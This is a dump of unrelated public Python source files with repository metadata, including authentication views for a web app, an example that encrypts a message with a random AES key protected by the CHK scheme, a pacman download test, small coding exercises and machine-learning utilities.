csv_writer.writerows(data_frame_list)
myfile.close()
| 30.625 | 113 | 0.668416 |
5f5aea15240bbd9611868813c51d975e0aeb66f9
| 467 |
py
|
Python
|
day46/decorator.py
|
nurmatthias/100DaysOfCode
|
22002e4b31d13e6b52e6b9222d2e91c2070c5744
|
[
"Apache-2.0"
] | null | null | null |
day46/decorator.py
|
nurmatthias/100DaysOfCode
|
22002e4b31d13e6b52e6b9222d2e91c2070c5744
|
[
"Apache-2.0"
] | null | null | null |
day46/decorator.py
|
nurmatthias/100DaysOfCode
|
22002e4b31d13e6b52e6b9222d2e91c2070c5744
|
[
"Apache-2.0"
] | null | null | null |
import time
def speed_calc_decorator(function):
def wrapper():
start_time = time.time()
function()
difference = time.time() - start_time
print(f"{function.__name__} run speed: {difference}s")
return wrapper
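# Editorial note: wrapper() reads function.__name__ from the closure, so the
# printed name stays correct, but the decorated function itself reports
# __name__ == 'wrapper'; applying functools.wraps(function) would fix that.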
@speed_calc_decorator
def fast_function():
for i in range(10000000):
i * i
@speed_calc_decorator
def slow_function():
for i in range(100000000):
i * i
fast_function()
slow_function()
| 19.458333 | 62 | 0.642398 |
39973a673c78692566cffd1fbfaf81caca542ccb
| 10,554 |
py
|
Python
|
src/onegov/org/views/auth.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/auth.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/views/auth.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
""" The authentication views. """
import morepath
from onegov.core.markdown import render_untrusted_markdown
from onegov.core.security import Public, Personal
from onegov.org import _, OrgApp
from onegov.org import log
from onegov.org.elements import Link
from onegov.org.layout import DefaultLayout
from onegov.org.mail import send_transactional_html_mail
from onegov.user import Auth, UserCollection
from onegov.user.auth.provider import OauthProvider
from onegov.user.errors import AlreadyActivatedError
from onegov.user.errors import ExistingUserError
from onegov.user.errors import ExpiredSignupLinkError
from onegov.user.errors import InvalidActivationTokenError
from onegov.user.errors import UnknownUserError
from onegov.user.forms import LoginForm
from onegov.user.forms import PasswordResetForm
from onegov.user.forms import RegistrationForm
from onegov.user.forms import RequestPasswordResetForm
from purl import URL
from webob import exc
@OrgApp.form(model=Auth, name='login', template='login.pt', permission=Public,
form=LoginForm)
def handle_login(self, request, form, layout=None):
""" Handles the login requests. """
if not request.app.enable_yubikey:
form.delete_field('yubikey')
if self.skippable(request):
return self.redirect(request, self.to)
if form.submitted(request):
redirected_to_userprofile = False
org_settings = request.app.settings.org
if org_settings.require_complete_userprofile:
username = form.username.data
if not org_settings.is_complete_userprofile(request, username):
redirected_to_userprofile = True
self.to = request.return_to(
'/userprofile',
self.to
)
response = self.login_to(request=request, **form.login_data)
if response:
if redirected_to_userprofile:
request.warning(_(
"Your userprofile is incomplete. "
"Please update it before you continue."
))
else:
request.success(_("You have been logged in."))
return response
request.alert(_("Wrong e-mail address, password or yubikey."))
layout = layout or DefaultLayout(self, request)
request.include('scroll-to-username')
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Login"), request.link(self, name='login'))
]
def provider_login(provider):
provider.to = self.to
return request.link(provider)
return {
'layout': layout,
'password_reset_link': request.link(self, name='request-password'),
'register_link': request.link(self, name='register'),
'may_register': request.app.enable_user_registration,
'button_text': _("Login"),
'providers': request.app.providers,
'provider_login': provider_login,
'render_untrusted_markdown': render_untrusted_markdown,
'title': _('Login to ${org}', mapping={
'org': request.app.org.title
}),
'form': form
}
@OrgApp.form(model=Auth, name='register', template='form.pt',
permission=Public, form=RegistrationForm)
def handle_registration(self, request, form, layout=None):
""" Handles the user registration. """
if not request.app.enable_user_registration:
raise exc.HTTPNotFound()
if form.submitted(request):
try:
user = self.register(form, request)
except ExistingUserError:
request.alert(_("A user with this address already exists"))
except ExpiredSignupLinkError:
request.alert(_("This signup link has expired"))
else:
url = URL(request.link(self, 'activate'))
url = url.query_param('username', form.username.data)
url = url.query_param('token', user.data['activation_token'])
subject = request.translate(
_("Your ${org} Registration", mapping={
'org': request.app.org.title
})
)
send_transactional_html_mail(
request=request,
template='mail_activation.pt',
subject=subject,
receivers=(form.username.data, ),
content={
'activation_link': url.as_string(),
'model': self
}
)
request.success(_(
"Thank you for registering. Please follow the instructions "
"on the activiation e-mail sent to you."
))
return morepath.redirect(request.link(request.app.org))
layout = layout or DefaultLayout(self, request)
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Register"), request.link(self, name='register'))
]
request.include('scroll-to-username')
return {
'layout': layout,
'title': _('Account Registration'),
'form': form
}
@OrgApp.view(model=Auth, name='activate', permission=Public)
def handle_activation(self, request):
if not request.app.enable_user_registration:
raise exc.HTTPNotFound()
users = UserCollection(request.session)
username = request.params.get('username')
token = request.params.get('token')
try:
users.activate_with_token(username, token)
except UnknownUserError:
request.warning(_("Unknown user"))
except InvalidActivationTokenError:
request.warning(_("Invalid activation token"))
except AlreadyActivatedError:
request.success(_("Your account has already been activated."))
else:
request.success(_(
"Your account has been activated. "
"You may now log in with your credentials"
))
return morepath.redirect(request.link(request.app.org))
def do_logout(self, request, to=None):
# the message has to be set after the log out code has run, since that
# clears all existing messages from the session
@request.after
def show_hint(response):
request.success(_("You have been logged out."))
return self.logout_to(request, to)
def do_logout_with_external_provider(self, request):
""" Use this function if you want to go the way to the external auth
provider first and then logout on redirect. """
from onegov.user.integration import UserApp # circular import
user = request.current_user
if not user:
do_logout(self, request)
if isinstance(self.app, UserApp) and user.source:
for provider in self.app.providers:
if isinstance(provider, OauthProvider):
if request.url == provider.logout_redirect_uri(request):
return do_logout(
self,
request,
to=request.browser_session.pop('logout_to', '/')
)
request.browser_session['logout_to'] = self.to
return morepath.redirect(provider.logout_url(request))
@OrgApp.html(model=Auth, name='logout', permission=Personal)
def view_logout(self, request):
""" Handles the logout requests. We do not logout over external auth
providers, since we anyway have like a hybrid login (using id_token to
establish our own login session with different expiration). """
return do_logout(self, request)
@OrgApp.form(model=Auth, name='request-password', template='form.pt',
permission=Public, form=RequestPasswordResetForm)
def handle_password_reset_request(self, request, form, layout=None):
""" Handles the GET and POST password reset requests. """
if request.app.disable_password_reset:
raise exc.HTTPNotFound()
layout = layout or DefaultLayout(self, request)
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Reset password"), request.link(self, name='request-password'))
]
if form.submitted(request):
user = UserCollection(request.session)\
.by_username(form.email.data)
url = layout.password_reset_url(user)
if url:
send_transactional_html_mail(
request=request,
template='mail_password_reset.pt',
subject=_("Password reset"),
receivers=(user.username, ),
content={'model': None, 'url': url}
)
else:
log.info(
"Failed password reset attempt by {}".format(
request.client_addr
)
)
response = morepath.redirect(request.link(self, name='login'))
request.success(
_(('A password reset link has been sent to ${email}, provided an '
'account exists for this email address.'),
mapping={'email': form.email.data})
)
return response
return {
'layout': layout,
'title': _('Reset password'),
'form': form,
'form_width': 'small'
}
@OrgApp.form(model=Auth, name='reset-password', template='form.pt',
permission=Public, form=PasswordResetForm)
def handle_password_reset(self, request, form, layout=None):
if request.app.disable_password_reset:
raise exc.HTTPNotFound()
if form.submitted(request):
# do NOT log the user in at this point - only onegov.user.auth does
# logins - we only ever want one path to be able to login, which makes
# it easier to do it correctly.
if form.update_password(request):
request.success(_("Password changed."))
return morepath.redirect(request.link(self, name='login'))
else:
request.alert(
_("Wrong username or password reset link not valid any more.")
)
log.info(
"Failed password reset attempt by {}".format(
request.client_addr
)
)
if 'token' in request.params:
form.token.data = request.params['token']
layout = layout or DefaultLayout(self, request)
layout.breadcrumbs = [
Link(_("Homepage"), layout.homepage_url),
Link(_("Reset password"), request.link(self, name='request-password'))
]
return {
'layout': layout,
'title': _('Reset password'),
'form': form,
'form_width': 'small'
}
| 33.611465 | 78 | 0.622039 |
841e8e7c47a49325e95a24e0cc97279aa3b36aa5
| 620 |
py
|
Python
|
setup.py
|
Pommesmajo09/Subdomains-Scan
|
8d939769fb83251cd0d683cba3916ba070fa6765
|
[
"MIT"
] | null | null | null |
setup.py
|
Pommesmajo09/Subdomains-Scan
|
8d939769fb83251cd0d683cba3916ba070fa6765
|
[
"MIT"
] | null | null | null |
setup.py
|
Pommesmajo09/Subdomains-Scan
|
8d939769fb83251cd0d683cba3916ba070fa6765
|
[
"MIT"
] | null | null | null |
import os
try:
    os.mkdir("data")
except FileExistsError:
    print("The data folder already exists!")
try:
    f = open("data/subdomains.txt", "r")
    f.read()
    f.close()
except FileNotFoundError:
    print("You first have to download the file subdomains.txt! Copy it into the data folder and restart the program!")
    taste = input("Understood?")
    exit(-1)
except Exception:
    print("Something went wrong!")
print("Setup finished successfully! You can now run Subdomains Scan.py!")
| 29.52381 | 136 | 0.690323 |
8432ddb361abfcb045f207736cc6d68f5110e185
| 1,495 |
py
|
Python
|
time compare.py
|
aertoria/MiscCode
|
a2e94d0fe0890e6620972f84adcb7976ca9f1408
|
[
"Apache-2.0"
] | null | null | null |
time compare.py
|
aertoria/MiscCode
|
a2e94d0fe0890e6620972f84adcb7976ca9f1408
|
[
"Apache-2.0"
] | null | null | null |
time compare.py
|
aertoria/MiscCode
|
a2e94d0fe0890e6620972f84adcb7976ca9f1408
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
class DateObj(object):
def __init__(self, year, month, day, hour, minute, second, msec):
self.year = int(year)
self.month = int(month)
self.day = int(day)
self.hour = int(hour)
self.minute = int(minute)
self.second = int(second)
self.msec = int(msec)
self.ensure_valid()
def ensure_valid(self):
		if self.month not in range(1,13): raise ValueError('Error Month')
		if self.day not in range(1,32): raise ValueError('Error Day')
#one of the solution
class Solution():
def compare(self,d1,d2):
#print d1
if self.month_of(d1) > self.month_of(d2):
return d1
elif self.month_of(d1) < self.month_of(d2):
return d2
elif self.msec_of(d1) >= self.msec_of(d2):
return d1
else:
return d2
def month_of(self,date):
year = date.year
return 12 * year + date.month
	def msec_of(self,date):
		day = date.day
		hour = 24*day + date.hour
		minute = 60*hour + date.minute
		second = 60*minute + date.second
		return 1000*second + date.msec
#second solution
class Solution2():
def compare(self,d1,d2):
d1_list = [d1.year,d1.month,d1.day,d1.hour,d1.minute,d1.second,d1.msec]
d2_list = [d2.year,d2.month,d2.day,d2.hour,d2.minute,d2.second,d2.msec]
if d1_list <= d2_list:
return d1
return d2
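# Note: Solution returns the later of the two dates, while Solution2 returns
# the earlier one (d1 on ties), so the two classes are not interchangeable.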
#testcases
#1989-12-24 3:7:6.98
date1=DateObj(1989, 12, 24, 3, 7, 6, 98)
#1989-07-24 6:4:6.98
date2=DateObj(1989, 07, 24, 6, 4, 6, 98)
date3=DateObj(1989, 12, 24, 3, 7, 6, 98)
s = Solution2()
#print s.compare(date1,date2)
#print s.compare(date1,date3)
print date1.__dict__
| 21.985294 | 73 | 0.663545 |
8466cde7695bc3bc64772aec48025e37968c4e27
| 166 |
py
|
Python
|
Algorithms/Implementation/designer_pdf_viewer.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/designer_pdf_viewer.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/designer_pdf_viewer.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
import string
h = list(map(int, input().split()))
word = input()
d = dict(zip(string.ascii_lowercase, h))
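# highlighted area = height of the tallest letter times the word length
# (each letter is one unit wide)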
v = [d[c] for c in word]
w = max(v) * len(word)
print(w)
| 15.090909 | 40 | 0.620482 |
29ddd784009f4e4a9bd9dcb496f22ba1f0e58e50
| 336 |
py
|
Python
|
PYTHON/Strings/find_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Strings/find_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Strings/find_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
def count_substring(string, sub_string):
l1 = len(string)
l2 = len(sub_string)
return len([i for i in range(0, l1 - l2 + 1) if (string[i:i+l2] == sub_string)])
if __name__ == '__main__':
string = input()
sub_string = input()
print(count_substring(string, sub_string))
| 19.764706 | 84 | 0.636905 |
d9e1818fa0119e9cdda4671be56751fe9e2f1744
| 2,672 |
py
|
Python
|
src/main/apps/mlops/utils/pipeline.py
|
Nouvellie/django-tflite
|
1d08fdc8a2ec58886d7d2b8d40e7b3598613caca
|
[
"MIT"
] | 2 |
2021-08-23T21:56:07.000Z
|
2022-01-20T13:52:19.000Z
|
src/main/apps/mlops/utils/pipeline.py
|
Nouvellie/django-tflite
|
1d08fdc8a2ec58886d7d2b8d40e7b3598613caca
|
[
"MIT"
] | null | null | null |
src/main/apps/mlops/utils/pipeline.py
|
Nouvellie/django-tflite
|
1d08fdc8a2ec58886d7d2b8d40e7b3598613caca
|
[
"MIT"
] | null | null | null |
import json
from collections import OrderedDict
from pathlib import Path
from typing import (
Generic,
List,
Optional,
Tuple,
TypeVar,
)
SELFCLASS = TypeVar('SELFCLASS')
FUNCTIONS_PIPELINE = OrderedDict()
def pipeline_function_register(func) -> None:
"""Add functions to the pipeline"""
if func.__name__ not in FUNCTIONS_PIPELINE:
FUNCTIONS_PIPELINE[func.__name__] = func
# print(f"{func.__name__} registered in Pipeline")
else:
raise Exception(f"Duplicated function with name {func.__name__}")
class Pipeline:
"""
Build a pipeline of functions
Pipeline structure: ("func_name", args, kwargs) or ("func_name", kwargs)
x -> Pipeline(x) -> new_x
"""
FUNCTIONS_PIPELINE = FUNCTIONS_PIPELINE
def __new__(cls, pipeline: Optional[List[Tuple[str, dict]]] = None, *args, **kwargs) -> Generic[SELFCLASS]:
return super(Pipeline, cls).__new__(cls, *args, **kwargs)
def __init__(self, pipeline: Optional[List[Tuple[str, dict]]] = None) -> None:
self.pipeline = pipeline if pipeline else []
def __call__(self, model_input: any) -> any:
"""Apply pipeline to the input 'x'."""
for pipe in self.pipeline:
func_name, *args, kwargs = pipe
assert isinstance(kwargs, dict), f"Wrong declaration in {func_name!r}. Must be (str, dict) or (str, tuple, dict)"
# Apply preprocessing. (args and kwargs provided)
if args:
model_input = self.apply(
model_input, func_name, *args, **kwargs)
else:
model_input = self.apply(model_input, func_name, **kwargs)
return model_input
@classmethod
def apply(cls, model_input: any, func_name: any, *args, **kwargs) -> any:
"""Compute func(x, *args, **kwargs)"""
if func_name in cls.FUNCTIONS_PIPELINE:
return cls.FUNCTIONS_PIPELINE[func_name](model_input, *args, **kwargs)
else:
raise TypeError(f"{func_name} not available!")
def from_json(self, preprocessing_path: str) -> None:
"""Gets the list of functions to be applied in the preprocess from a list in json."""
preprocessing_path = Path(preprocessing_path)
with open(str(preprocessing_path), "r", encoding="utf8") as pp:
pipeline = json.load(pp)
self.pipeline = pipeline
# print("\n", f"Pipeline loaded from {preprocessing_path!r}")
    def is_available(self, func_name: str) -> bool:
        """Return True if the function 'func_name' is available in Pipeline"""
        return func_name in self.FUNCTIONS_PIPELINE
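# Minimal usage sketch (editorial illustration, not part of the original
# module; `double` is a hypothetical function registered only for this demo).
if __name__ == "__main__":
    @pipeline_function_register
    def double(model_input, factor=2):
        return model_input * factor
    demo = Pipeline([("double", {"factor": 3})])
    print(demo(2))  # applies double(2, factor=3) and prints 6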
| 34.701299 | 125 | 0.640719 |
d9e5e0743392171022fdbc998a69f23466bd548a
| 224 |
py
|
Python
|
PYTHON/Sets/set_union_oper.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Sets/set_union_oper.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Sets/set_union_oper.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
if __name__ == '__main__':
i = int(input())
A = set(map(int, input().split()))
j = int(input())
B = set(map(int, input().split()))
res = A.union(B)
print(len(res))
| 18.666667 | 38 | 0.544643 |
8a4e867ab5d50eaffd7b2f7d85daebbbb4a62b1f
| 765 |
py
|
Python
|
v401/python/rechnung.py
|
chrbeckm/anfaenger-praktikum
|
51764ff23901de1bc3d16dc935acfdc66bb2b2b7
|
[
"MIT"
] | 2 |
2019-12-10T10:25:11.000Z
|
2021-01-26T13:59:40.000Z
|
v401/python/rechnung.py
|
chrbeckm/anfaenger-praktikum
|
51764ff23901de1bc3d16dc935acfdc66bb2b2b7
|
[
"MIT"
] | null | null | null |
v401/python/rechnung.py
|
chrbeckm/anfaenger-praktikum
|
51764ff23901de1bc3d16dc935acfdc66bb2b2b7
|
[
"MIT"
] | 1 |
2020-12-06T21:24:58.000Z
|
2020-12-06T21:24:58.000Z
|
import numpy as np
import uncertainties.unumpy as unumpy
from uncertainties import ufloat
from scipy.stats import sem
print('Wellenlaenge')
dd1, za = np.genfromtxt('python/wellenlaenge.txt', unpack=True)
dd = (dd1*10**(-3))/5.017
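# wavelength from mirror displacement dd and fringe count za, lam = 2*dd/za
# (presumably a Michelson-type interferometer; editorial comment)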
lam = 2 * dd / za
mlam = np.mean(lam)
slam = sem(lam)
rlam = ufloat(mlam, slam)
np.savetxt('build/wellenlaenge.txt', np.column_stack([dd1, dd, za, lam]), header='dd1, dd, za, lam')
print('Vakuum')
dp, zb = np.genfromtxt('python/vakuum.txt', unpack=True)
dn = zb * 650*10**(-9) / (2 * 0.05)
mdn = np.mean(dn)
sdn = sem(dn)
rdn = ufloat(mdn, sdn)
n = 1 + rdn * 295.15 * 1.0132 / (273.15*0.8)
print('rlam =',rlam)
print('rdn =',rdn)
print('n =',n)
np.savetxt('build/vakuum.txt', np.column_stack([dp, zb, dn]), header='dp, zb, delta n')
| 29.423077 | 100 | 0.662745 |
8a6097d433c6982ea17e36743e348c77321aeb64
| 4,499 |
py
|
Python
|
examples/chk-enc.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
examples/chk-enc.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
examples/chk-enc.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017, Joseph deBlaquiere <[email protected]>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of ecpy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pypbc
from fspke.chk import CHKPublicKey
from argparse import ArgumentParser
import base64
import sys
from hashlib import sha256
import Crypto.Random as Random
from Crypto.Cipher import AES
from Crypto.Util import Counter
import asn1
def bxor(b1, b2):  # use xor for bytes
    parts = []
    for x, y in zip(b1, b2):
        parts.append(bytes([x ^ y]))
    return b''.join(parts)
desc = ('chk-enc encrypts a message using AES encryption based on a '
'random key and then encrypts that random key using the CHK '
'forward secure encryption scheme. Output is DER encoded '
'and PEM-wrapped')
parser = ArgumentParser(description=desc)
parser.add_argument('pubkey', help='file path for file containing public key')
parser.add_argument('--interval', type=int, default=0, help='interval value to encrypt for')
parser.add_argument('-f', '--file', default=None, help='read message plaintext from file instead of stdin')
clargs = parser.parse_args()
with open(clargs.pubkey, 'r') as keyfile:
PEMkey=keyfile.read()
DERkey = base64.b64decode(PEMkey.split('-----')[2].encode())
try:
pubkey = CHKPublicKey.publicKeyFromDER(DERkey)
except ValueError:
sys.exit('Error: Unable to import public key, aborting.')
if pubkey is None:
sys.exit('Error: Unable to import public key, aborting.')
if clargs.file is None:
message = sys.stdin.read()
else:
with open(clargs.file, 'r') as msgfile:
message=msgfile.read()
if (message is None) or (len(message) == 0):
sys.exit('Error: Plaintext length 0, aborting.')
# generate a random 256 bit key for encryption, 128 bit counter for MODE_CTR
AESkey = Random.new().read(32)
# counter starts at 1... Secure so long as we don't re-use the key
counter = Counter.new(128)
aescipher = AES.new(AESkey, AES.MODE_CTR, counter=counter)
# encrypt message (symmetric encryption)
aes_ct = aescipher.encrypt(message)
# because the plaintext space of the CHK algorithm is point coordinates
# we generate a secure random key, hash to get a byte string and use that
# as a one time pad to encrypt the AES key (by XOR)
# generate a random message for CHK (which is a point in Fp2)
chk_pt = pubkey.gt * Random.random.randint(1,pubkey.r)
# hash to create a string from point coordinates
randhash = sha256(str(chk_pt).encode()).digest()
assert len(randhash) == len(AESkey)
xorkey = bxor(AESkey, randhash)
# encode random element using CHK BTE algorithm
chk_ct = pubkey.Enc_DER(chk_pt, clargs.interval)
# encode PKE encrypted key, xor key, aes ciphertext in DER
encoder = asn1.Encoder()
encoder.start()
encoder.enter(asn1.Numbers.Sequence)
encoder.write(chk_ct, asn1.Numbers.OctetString)
encoder.write(xorkey, asn1.Numbers.OctetString)
encoder.write(aes_ct, asn1.Numbers.OctetString)
encoder.leave()
DERmsg = encoder.output()
print('-----BEGIN CHK ENCRYPTED MESSAGE-----')
print(base64.b64encode(DERmsg).decode())
print('-----END CHK ENCRYPTED MESSAGE-----')
| 39.464912 | 107 | 0.750389 |
0ac99080ea9b97aa5eb8cf1f9863ba84b15da3f5
| 523 |
py
|
Python
|
pacman-arch/test/pacman/tests/xfercommand001.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/xfercommand001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/xfercommand001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Quick check for using XferCommand"
# this setting forces us to download packages
self.cachepkgs = False
#wget doesn't support file:// urls. curl does
self.option['XferCommand'] = ['/usr/bin/curl %u -o %o']
numpkgs = 10
pkgnames = []
for i in range(numpkgs):
name = "pkg_%s" % i
pkgnames.append(name)
p = pmpkg(name)
p.files = ["usr/bin/foo-%s" % i]
self.addpkg2db("sync", p)
self.args = "-S %s" % ' '.join(pkgnames)
for name in pkgnames:
self.addrule("PKG_EXIST=%s" % name)
| 24.904762 | 55 | 0.646272 |
6b2841e62fab3089b25520d511fea6a815878b79
| 872 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch06_arrays/ex04_rotation_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch06_arrays/ex04_rotation_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch06_arrays/ex04_rotation_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
from ch06_arrays.solutions.ex04_rotate_inplace import rotate_inplace
def test_rotation():
values = [['1', '2', '3', '4', '5', '6'],
['J', 'K', 'L', 'M', 'N', '7'],
['I', 'V', 'W', 'X', 'O', '8'],
['H', 'U', 'Z', 'Y', 'P', '9'],
['G', 'T', 'S', 'R', 'Q', '0'],
['F', 'E', 'D', 'C', 'B', 'A']]
rotate_inplace(values)
expected = [to_list("F G H I J 1"),
to_list("E T U V K 2"),
to_list("D S Z W L 3"),
to_list("C R Y X M 4"),
to_list("B Q P O N 5"),
# so sähe es von Hand aus
list("A 0 9 8 7 6".replace(" ", ""))]
assert values == expected
def to_list(text):
return list(text.replace(" ", ""))
| 28.129032 | 68 | 0.426606 |
6b4321b71e025727969edbd03c6de2879bf645f0
| 400 |
py
|
Python
|
server/ImageProcessor.py
|
Thukor/MazeSolver
|
c953e193ce27a7348e8ec9c5592144426dfce193
|
[
"MIT"
] | 5 |
2018-02-06T22:48:34.000Z
|
2020-01-07T20:19:05.000Z
|
server/ImageProcessor.py
|
Thukor/MazeSolver
|
c953e193ce27a7348e8ec9c5592144426dfce193
|
[
"MIT"
] | 11 |
2018-01-31T21:47:49.000Z
|
2018-04-21T16:42:52.000Z
|
server/ImageProcessor.py
|
Thukor/MazeSolver
|
c953e193ce27a7348e8ec9c5592144426dfce193
|
[
"MIT"
] | 2 |
2020-06-18T05:40:03.000Z
|
2022-02-02T03:46:30.000Z
|
from image_processing import *
"""
Processor Class for images
"""
class ImageProcessor:
	#initialize strategies
	def __init__(self, strategies=None):
		# fall back to the two standard steps when no strategies are given
		self.strategies = strategies or [birdseye_correction, image_segmentation]
	#We interpret each set of processing functions as strategies.
	def process_image(self, image_name, number):
		birdseye_correction(image_name, number)
		image_segmentation("warped.png", number)
| 22.222222 | 62 | 0.7875 |
863774c95b28b062d1596f079abc8fa6527db92b
| 3,444 |
py
|
Python
|
research/cv/resnetv2/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 1 |
2021-11-18T08:17:44.000Z
|
2021-11-18T08:17:44.000Z
|
research/cv/resnetv2/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | null | null | null |
research/cv/resnetv2/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 2 |
2019-09-01T06:17:04.000Z
|
2019-10-04T08:39:45.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""postprocess"""
import os
import json
import argparse
import numpy as np
from mindspore.nn import Top1CategoricalAccuracy, Top5CategoricalAccuracy
parser = argparse.ArgumentParser(description="postprocess")
parser.add_argument("--dataset", type=str, required=True, help="dataset type.")
parser.add_argument("--result_path", type=str, required=True, help="result files path.")
parser.add_argument("--label_path", type=str, required=True, help="label file path.")
args_opt = parser.parse_args()
if args_opt.dataset == "cifar10":
from src.config import config1 as config
elif args_opt.dataset == "cifar100":
from src.config import config2 as config
elif args_opt.dataset == 'imagenet2012':
from src.config import config3 as config
else:
raise ValueError("dataset is not support.")
def cal_acc_cifar(result_path, label_path):
'''calculate cifar accuracy'''
top1_acc = Top1CategoricalAccuracy()
top5_acc = Top5CategoricalAccuracy()
result_shape = (config.batch_size, config.class_num)
file_num = len(os.listdir(result_path))
label_list = np.load(label_path)
for i in range(file_num):
f_name = args_opt.dataset + "_bs" + str(config.batch_size) + "_" + str(i) + "_0.bin"
full_file_path = os.path.join(result_path, f_name)
if os.path.isfile(full_file_path):
result = np.fromfile(full_file_path, dtype=np.float32).reshape(result_shape)
gt_classes = label_list[i]
top1_acc.update(result, gt_classes)
top5_acc.update(result, gt_classes)
print("top1 acc: ", top1_acc.eval())
print("top5 acc: ", top5_acc.eval())
def cal_acc_imagenet(result_path, label_path):
'''calculate imagenet2012 accuracy'''
batch_size = 1
files = os.listdir(result_path)
with open(label_path, "r") as label:
labels = json.load(label)
top1 = 0
top5 = 0
